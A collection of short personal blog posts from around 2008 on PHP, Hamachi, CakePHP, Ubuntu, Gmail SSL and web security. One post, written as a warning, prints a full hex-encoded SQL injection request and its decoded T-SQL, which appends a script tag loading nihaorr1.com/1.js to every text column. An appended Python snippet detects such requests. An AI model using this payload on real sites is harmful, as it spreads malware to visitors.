Repost: If Programming Languages Were Religions

A very funny post for the programming nerds out there:

If programming languages were religions…

By amz - Monday, December 15, 2008 at 14:52

PHP would be Cafeteria Christianity - Fights with Java for the web market. It draws a few concepts from C and Java, but only those that it really likes. Maybe it’s not as coherent as other languages, but at least it leaves you with much more freedom and ostensibly keeps the core idea of the whole thing. Also, the whole concept of “goto hell” was abandoned.

Mantis To Basecamp To-do(s)

I just created a handy little script to create to-dos in Basecamp for unresolved tickets in Mantis.

You can see the open sourced code/project: http://code.google.com/p/mantis2basecamp-todo/.

This is something we found useful, if you use both tools, you might find it useful as well.

Hamachi Install Error On Ubuntu - Fixed

I recently re-installed Ubuntu (Linux) on a server and ran into difficulties installing Hamachi. As it turned out, I tried to set up Hamachi without installing the tun module first. I then installed the tun module, but Hamachi wouldn’t work. I eventually figured out that the tuncfg had to be cleaned/make’ed again, after the tun was re-created.

This is the error I was getting:

bash: /sbin/tuncfg: No such file or directory

And this fixed it:

./hamachi-0.9.9.9-20-lnx# cd tuncfg
./hamachi-0.9.9.9-20-lnx/tuncfg# sudo make clean
rm -f tuncfg
./hamachi-0.9.9.9-20-lnx/tuncfg# sudo make
cc     tuncfg.c   -o tuncfg
./hamachi-0.9.9.9-20-lnx/tuncfg# cd ..
./hamachi-0.9.9.9-20-lnx# sudo make install

Copying hamachi into /usr/bin ..
Creating hamachi-init symlink ..
Compiling tuncfg ..
Copying tuncfg into /sbin ..

Hamachi is installed. See README for what to do next.
./hamachi-0.9.9.9-20-lnx# sudo tuncfg

Grand Central - Project Care (phone Numbers For The Homeless)

I’ve been using grand central for a while, but noticed this today:


Project CARE (Communications and Respect for Everybody) recognizes the desire for those in need to get back on their feet and begin a new life. An essential element to that proposition is a consistent and reliable phone number - a place where anyone (family, friends, social workers, health care providers, potential employers, etc.) can leave you a message.

No longer will the pay phone at the local shelter be the only way to reach a homeless client. Whether applying for a job, waiting for medical test results, or trying to get in touch with family, Project CARE provides homeless clients with link to the real world and an ability to connect.

Project CARE Support and Feedback: (415) 287-7400

Pirate Name For “talk Like A Pirate Day”

Real Name : Alan Blount
Pirate Name : Baginda Mugsy Gladden
Ship Name : Queen Licia Red Cobra

Source: www.piratename.net

CakePHP Workshop, In Review

We had the very good fortune of attending the first CakePHP workshop, in Raleigh, NC this weekend. Four of the core developers of the project were there, including the project manager and the lead developer, along with one of the guys behind jquery-UI. The non-presenters ranged from people who had never used CakePHP to people who had been using it for a couple of years.

The presentations were fantastic, often just building a
project live, explaining their steps and choices and debugging as they
went. In addition, there was a second
room where the hosts who were not presenting were happy to go over specific
problems, questions, and code, as well as talking about coding approaches or
testing or pretty much anything else.
The one-on-one time was incredibly useful both technically and it was invaluable
to put faces on names.

Since it was just a bunch of geeks, we ended up all going
out to dinner and hanging out in the hotel lobby until 2am, talking about code
and projects and whatever else (HttpSocket).
The Cake guys were very friendly, open, and encouraging – actually liking
some of our work we showed them (at least faking it well). More importantly, they were very quick with suggestions
and information and all sorts of tricks and techniques which would have taken weeks
or months of research to discover on our own.

All in all, the cost was dirt cheap for what we got out of
it and we are very much looking forward to a future “advanced” workshop next
year.

Thanks Guys (and Cindy),

Alan & Corey

CakePHP Workshop 2008.09.06

So here I am, in Raleigh, NC - waiting for the CakePHP Workshop to start… We survived the rain so far, waiting to see if there is any flooding or whatnot.

Have met a few people here so far, all seem very friendly. Looking forward to seeing what happens and what we learn along the way.

I am wearing my “I [heart] LAMP” geek-shirt today, as it seemed appropriate (if a little over the top nerdy).

Modern Internet Identity Theft By Andrew Patrick

A recent report from Don Jackson at SecureWorks (dated March 20 2007) examines a new Trojan and provides some alarming insights on Internet Identity Theft. It is worth reviewing this case carefully to understand how sophisticated modern identity theft schemes have become, and how difficult it can be to investigate and prevent them. What makes this Trojan interesting is that it:

  • is installed automatically simply by visiting an infected web site
  • is invisible to the user
  • is often missed by anti-virus software
  • is able to steal identity information even if it is encrypted using https
  • efficiently collects large amounts of information and sends it to a “mother ship”
  • provides an interface for fraudsters to easily purchase the stolen data
  • has been used to collect thousands of login credentials at major banks and government agencies
  • has not been shut down
  • is only one of many such programs that are now offered as kits

source: http://www.andrewpatrick.ca/essays/modern-internet-identity-theft/

his source: http://www.secureworks.com/research/threats/gozi/?threat=gozi

Gmail Users Should Go SSL

Why You Should Turn Gmail’s SSL Feature On Now

Let’s talk security and why you should take advantage of Gmail’s recent SSL feature, and why you might want to be careful using other non-SSL webmail services.

But first, make sure your connection is secured using SSL.

How do you know a connection is secured by SSL? The handy “s” after “http” will tell you. For example, https://mail.google.com is encrypted while http://mail.google.com is not. You can force an encryption by adding the “s” yourself, or by turning on “Always use https” from the Browser Connection settings of your Gmail account.

It’s not just your email - changing your password gives access to your google docs, analytics, notes, etc… I’ve been forcing https with a firefox plugin for a while - but much better as a gmail setting, since it travels to other computers with me.

Dell Is Now Shipping Computers With Ubuntu Installed

Here’s a list of computers being shipped by Dell with Ubuntu… decent savings, good systems, and pro linux… makes me really happy.

Holy Hand Grenades, Firefox3 + Firebug1.2 = Amazing!

I’ve been putting off upgrading to FF3 because I was afraid of plugins which wouldn’t work and at this point, I live by many of my FF addons.

Well I feel silly now - having updated… Things seem to be as smooth as possible and FF is much more responsive. YAY MOZILLA!

A Wonderful Investigation Into Ubuntu Usability

I think Ubuntu is great, easy to use, standardized, and built on Debian… what could be better? Apparently - there are certainly some things which could be better.

Here is a great experiment one geek and his girlfriend undertook:

Introduction

I’ve toyed with Linux since 2002, when I first installed Mandrake. With the latest release of Ubuntu,
I was interested to see how far Linux had come since then in terms of
being used easily by the mainstream. So, I tricked my grudging
girlfriend Erin into sitting down at a brand new Ubuntu 8.04
installation and performing some basic tasks. It’s surprising how many
seemingly simple things become complicated and even out of reach for
someone without a knowledge of Linux. There are a lot of little things
that could be done to make the experience a lot more friendly for
non-computer-literate people – some of them easy to implement, others
not at all.

Work Sites Attacked

Just an FYI - some of our old sites are not filtering out injection
attacks and got hosed last weekend. The attack seems fairly
sophisticated (imo) and is described in this post.

orderitem.asp?IT=GM-204;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0×4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C004000
4300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F0072002000430055
00520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D00200073007900
73006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069
006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F0072002000
62002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D0031
0036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00
200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C00450028004000400046004500540043
0048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B00
27005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C
005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E00
6900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E0045
00580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E0044002000
43004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F00430075
00720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);–

If you just copy the hex value from this URL, as this…


And convert this to an ASCII value; you can convert hex to ASCII.

I got this…

DECLARE @T varchar(255)’@C varchar(255) DECLARE Table_Cursor CURSOR FOR
select a.name’b.name from sysobjects a’syscolumns b where a.id=b.id and
a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or
b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T’@C
WHILE(@@FETCH_STATUS=0) BEGIN exec(’update [’+@T+’ set
[’+@C+’=rtrim(convert(varchar’['+@C+’))+”<script
src=nihaorr1.com/1.js></script>”’)FETCH NEXT FROM
Table_Cursor INTO @T’@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

SQL Server Injection!!!! Here you can see the script being inserted
using Table Cursors, to each column in the table. If you read the code
you can see how each table in the entire database will be affected from
this.

The source of this came from 219.153.46.28,
28.46.153.219.broad.cq.cq.dynamic.163data.com.cn, the Agent is Indy
Library a CHINESE Bot. The agent Indy Library should be blocked entirely.

Our attacks were similar and also coming from 219.153.46.28

——————–

if you’ve got crappy/insecure code out there - be warned
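An added example, not part of the original post or the post it quotes: a small Python log check that flags request lines carrying the CAST(0x… AS NVARCHAR) plus EXEC(@S) pattern shown above and decodes the hex so the hidden SQL can be read during triage. The log line layout and the function names are assumptions, and the sample lines are constructed with a harmless payload.

```python
import re
from urllib.parse import unquote

# Hex literal CAST to (N)VARCHAR, later run with EXEC(@var), as in the request
# quoted above. "0×" is accepted too because some pages render "0x" that way.
CAST_HEX = re.compile(r"CAST\s*\(\s*0[x×]([0-9A-F]+)\s+AS\s+N?VARCHAR", re.I)
EXEC_VAR = re.compile(r"EXEC\s*\(\s*@\w+\s*\)", re.I)

def utf16_hex(text):
    """Hex of text as UTF-16LE, the byte layout SQL Server uses for NVARCHAR."""
    return text.encode("utf-16-le").hex().upper()

def decode_payload(hex_text):
    """Turn the hex literal back into readable SQL for triage."""
    raw = bytes.fromhex(hex_text[: len(hex_text) // 2 * 2])  # drop a stray nibble
    # ASCII text stored as UTF-16LE has a zero in every second byte.
    if len(raw) % 2 == 0 and raw[1::2].count(0) * 2 >= len(raw) // 2:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")

def inspect_request(line):
    """Return a finding for a CAST(0x...)+EXEC request line, else None."""
    decoded = unquote(line)  # %20 -> space, so the keywords become matchable
    match = CAST_HEX.search(decoded)
    if not match or not EXEC_VAR.search(decoded):
        return None
    sql = decode_payload(match.group(1))
    return {
        "sql": sql,
        "reads_catalog": bool(re.search(r"sysobjects|syscolumns", sql, re.I)),
        "adds_script_tag": "<script" in sql.lower(),
    }

def scan(lines):
    """Return (line_number, finding) for every suspicious line."""
    return [(n, f) for n, line in enumerate(lines, 1) if (f := inspect_request(line))]

# Constructed sample log lines; the hex here encodes a harmless SELECT.
SAMPLE_LOG = [
    "GET /orderitem.asp?IT=GM-204 200",
    "GET /orderitem.asp?IT=GM-204;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x"
    + utf16_hex("select name from sysobjects")
    + "%20AS%20NVARCHAR(4000));EXEC(@S);-- 200",
    "GET /search.asp?q=cast%20iron%20pan 200",
]

if __name__ == "__main__":
    for number, finding in scan(SAMPLE_LOG):
        print(number, finding)
```

A hit in the logs only shows that the request arrived; whether it ran depends on whether the page concatenates the parameter into its SQL, which is the flaw the post says the old sites had.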
